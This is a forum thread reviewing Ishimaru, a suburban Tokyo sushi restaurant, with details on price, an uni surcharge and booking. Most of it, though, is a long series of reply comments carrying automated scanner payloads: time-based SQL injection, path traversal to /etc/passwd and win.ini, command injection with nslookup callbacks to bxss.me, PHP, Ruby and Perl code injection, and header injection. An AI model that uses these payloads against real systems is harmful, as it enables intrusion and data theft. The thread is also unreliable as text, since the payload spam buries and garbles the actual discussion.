Apparently the owner is someone who had no formal master in sushi and worked in a bar before? (https://www.youtube.com/watch?v=VrK5nxFjNIQ) The form of the nigiri looks very good, though, so I'd be very interested in reviews of this place! (However, I've also heard that you may need a Japanese speaker to take you there..)
Thanks Justin for the link. Yes saw the tabelog reviews and the form of the nigiri looks very good. And being on Tokyo suburbs making it less touristy is very appealing to me.
I visited Ishimaru for lunch earlier in the year. Appetizer, 14 nigiri, soup, tamago, kanpyo, fruit. Rice was firm and very mild, nigiri were tiny. Couldn't really fault the sushi. Chef likes to talk and everyone was treated the same.
I was quoted JPY 16,500 for the set but the chef asked everyone if they wanted uni for a separate charge. This was 3 lobes of Daisen uni, which of course was fantastic, but ended up being an additional JPY 3,300.
Given the location I was expecting a bit more value for money and if a cheaper uni was included in the course I might have gone back but if you order the uni then little reason to leave Tokyo from a cost perspective and if you don't then you have to watch everyone else eat it. Disappointment either way.
Overall I'd still recommend it. If you can make a couple of hours between changing trains it's convenient. Easy to book. Lunch is Saturday only and I booked the same week. Two spare seats on my visit.
6 Comments
I have never been there, but I have heard that Ishimaru is quite good.
I might recommend them over MatsunoSushi.
re: Leo Saito
sYuyFkL7
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+599-599-1=0+0+0+1
re: Leo Saito
-1 OR 3+599-599-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
eIj5WCHJ
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+846-846-1=0+0+0+1
re: Leo Saito
-1 OR 3+846-846-1=0+0+0+1
re: Leo Saito
N4g42YnT'; waitfor delay '0:0:15' --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
-5 OR 900=(SELECT 900 FROM PG_SLEEP(15))--
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
-5) OR 665=(SELECT 665 FROM PG_SLEEP(15))--
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
-1)) OR 184=(SELECT 184 FROM PG_SLEEP(15))--
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
mle8tR6X' OR 62=(SELECT 62 FROM PG_SLEEP(15))--
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
xcDTqKOI') OR 200=(SELECT 200 FROM PG_SLEEP(15))--
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
YQnunuBM')) OR 876=(SELECT 876 FROM PG_SLEEP(15))--
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
7Eq9VeNz'; waitfor delay '0:0:15' --
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
-5 OR 298=(SELECT 298 FROM PG_SLEEP(15))--
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
-5) OR 15=(SELECT 15 FROM PG_SLEEP(15))--
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@dZVcu
re: Leo Saito
-1)) OR 506=(SELECT 506 FROM PG_SLEEP(15))--
re: Leo Saito
bnMQZX7R' OR 714=(SELECT 714 FROM PG_SLEEP(15))--
re: Leo Saito
jjHguv2a') OR 73=(SELECT 73 FROM PG_SLEEP(15))--
re: Leo Saito
FlqlUoPU')) OR 834=(SELECT 834 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@ebzgv
re: Leo Saito
1Vg7EBXLO
re: Leo Saito
response.write(9318444*9780386)
re: Leo Saito
'+response.write(9318444*9780386)+'
re: Leo Saito
"+response.write(9318444*9780386)+"
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
%0abcc:074625.67-16761.67.afc76.19990.2@bxss.me
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-16762.67.afc76.19990.2@bxss.me
re: Leo Saito
file:///etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
echo shdtzo$()\ lluhyd\nz^xyu||a #' &echo shdtzo$()\ lluhyd\nz^xyu||a #|" &echo shdtzo$()\ lluhyd\nz^xyu||a #
re: Leo Saito
/etc/passwd
re: Leo Saito
&echo dyhvsg$()\ ujbrxa\nz^xyu||a #' &echo dyhvsg$()\ ujbrxa\nz^xyu||a #|" &echo dyhvsg$()\ ujbrxa\nz^xyu||a #
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
|echo hnzykz$()\ yyxkkn\nz^xyu||a #' |echo hnzykz$()\ yyxkkn\nz^xyu||a #|" |echo hnzykz$()\ yyxkkn\nz^xyu||a #
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
(nslookup hitpdgyuymuxnb8173.bxss.me||perl -e "gethostbyname('hitpdgyuymuxnb8173.bxss.me')")
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
$(nslookup hitfnjcndvjyna25b9.bxss.me||perl -e "gethostbyname('hitfnjcndvjyna25b9.bxss.me')")
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
&nslookup hitpqinwunnkf428f5.bxss.me&'\"`0&nslookup hitpqinwunnkf428f5.bxss.me&`'
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
&(nslookup hitlpyuxoxftif32c5.bxss.me||perl -e "gethostbyname('hitlpyuxoxftif32c5.bxss.me')")&'\"`0&(nslookup hitlpyuxoxftif32c5.bxss.me||perl -e "gethostbyname('hitlpyuxoxftif32c5.bxss.me')")&`'
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
|(nslookup hitxjibjaldjk8f77c.bxss.me||perl -e "gethostbyname('hitxjibjaldjk8f77c.bxss.me')")
re: Leo Saito
${9999174+10000235}
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
`(nslookup hityghmrkecpu9ead2.bxss.me||perl -e "gethostbyname('hityghmrkecpu9ead2.bxss.me')")`
re: Leo Saito
file:///etc/passwd
re: Leo Saito
;(nslookup hitbcgcnxcnkndd823.bxss.me||perl -e "gethostbyname('hitbcgcnxcnkndd823.bxss.me')")|(nslookup hitbcgcnxcnkndd823.bxss.me||perl -e "gethostbyname('hitbcgcnxcnkndd823.bxss.me')")&(nslookup hitbcgcnxcnkndd823.bxss.me||perl -e "gethostbyname('hitbcgcnxcnkndd823.bxss.me')")
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
)
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
'.gethostbyname(lc('hitwl'.'oonkwaas73980.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(76).chr(116).chr(81).'
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
".gethostbyname(lc("hitoe"."kqcjjtkj52e36.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(80).chr(106).chr(82)."
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
/etc/shells
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(106).concat(84).concat(110).concat(66)+(require"socket"
Socket.gethostbyname("hitit"+"rtbkqwktf3fce.bxss.me.")[3].to_s)+"
re: Leo Saito
bxss.me
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(98).concat(68).concat(105).concat(67)+(require'socket'
Socket.gethostbyname('hitrc'+'wwmskruz8091e.bxss.me.')[3].to_s)+'
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
'"
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
<!--
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+248-248-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+248-248-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+482-482-1=0+0+0+1
re: Leo Saito
-1 OR 3+482-482-1=0+0+0+1
re: Leo Saito
-1' OR 2+670-670-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+670-670-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+906-906-1=0+0+0+1 or 'WPu8ftYW'='
re: Leo Saito
-1' OR 3+906-906-1=0+0+0+1 or 'WPu8ftYW'='
re: Leo Saito
-1" OR 2+668-668-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+668-668-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
8HiAA1Jc'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 748=(SELECT 748 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 159=(SELECT 159 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 554=(SELECT 554 FROM PG_SLEEP(15))--
re: Leo Saito
0QHBNTR1' OR 394=(SELECT 394 FROM PG_SLEEP(15))--
re: Leo Saito
9Gl12usQ') OR 865=(SELECT 865 FROM PG_SLEEP(15))--
re: Leo Saito
uuQp4mcH')) OR 282=(SELECT 282 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@4Co9Z
Thanks saito-san. Will try booking ishimaru.
re: Yee How
heAwlzLr
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+660-660-1=0+0+0+1
re: Yee How
-1 OR 3+660-660-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
vxJOMWfl'; waitfor delay '0:0:15' --
re: Yee How
6t0mgEnA
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+83-83-1=0+0+0+1
re: Yee How
-1 OR 3+83-83-1=0+0+0+1
re: Yee How
-5 OR 64=(SELECT 64 FROM PG_SLEEP(15))--
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
-5) OR 42=(SELECT 42 FROM PG_SLEEP(15))--
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
-1)) OR 74=(SELECT 74 FROM PG_SLEEP(15))--
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
HLbBbAwd' OR 420=(SELECT 420 FROM PG_SLEEP(15))--
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
s7HMEGtr') OR 268=(SELECT 268 FROM PG_SLEEP(15))--
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
cYfSXKZY')) OR 418=(SELECT 418 FROM PG_SLEEP(15))--
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
Xe0ZCis7'; waitfor delay '0:0:15' --
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
-5 OR 578=(SELECT 578 FROM PG_SLEEP(15))--
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@laMjj
re: Yee How
-5) OR 911=(SELECT 911 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 791=(SELECT 791 FROM PG_SLEEP(15))--
re: Yee How
MXrv9TK6' OR 652=(SELECT 652 FROM PG_SLEEP(15))--
re: Yee How
5s4k4SWx') OR 919=(SELECT 919 FROM PG_SLEEP(15))--
re: Yee How
9QAaHMlV')) OR 531=(SELECT 531 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@i7hS3
re: Yee How
1LtBMMQtO
re: Yee How
response.write(9684491*9672927)
re: Yee How
'+response.write(9684491*9672927)+'
re: Yee How
"+response.write(9684491*9672927)+"
re: Yee How
%0abcc:074625.67-16795.67.b1d2b.19990.2@bxss.me
re: Yee How
to@example.com>%0d%0abcc:074625.67-16796.67.b1d2b.19990.2@bxss.me
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
file:///etc/passwd
re: Yee How
${9999368+9999149}
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
echo nyviuh$()\ mehufb\nz^xyu||a #' &echo nyviuh$()\ mehufb\nz^xyu||a #|" &echo nyviuh$()\ mehufb\nz^xyu||a #
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
&echo wzvobw$()\ tgszrr\nz^xyu||a #' &echo wzvobw$()\ tgszrr\nz^xyu||a #|" &echo wzvobw$()\ tgszrr\nz^xyu||a #
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
|echo fesmdf$()\ fyjzvb\nz^xyu||a #' |echo fesmdf$()\ fyjzvb\nz^xyu||a #|" |echo fesmdf$()\ fyjzvb\nz^xyu||a #
re: Yee How
/etc/passwd
re: Yee How
(nslookup hitvcggifplce654f6.bxss.me||perl -e "gethostbyname('hitvcggifplce654f6.bxss.me')")
re: Yee How
)
re: Yee How
%2fetc%2fpasswd
re: Yee How
$(nslookup hitwsktomapyte87a7.bxss.me||perl -e "gethostbyname('hitwsktomapyte87a7.bxss.me')")
re: Yee How
!(()&&!|*|*|
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
&nslookup hitqxiszxlxty80dc4.bxss.me&'\"`0&nslookup hitqxiszxlxty80dc4.bxss.me&`'
re: Yee How
^(#$!@#$)(()))******
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
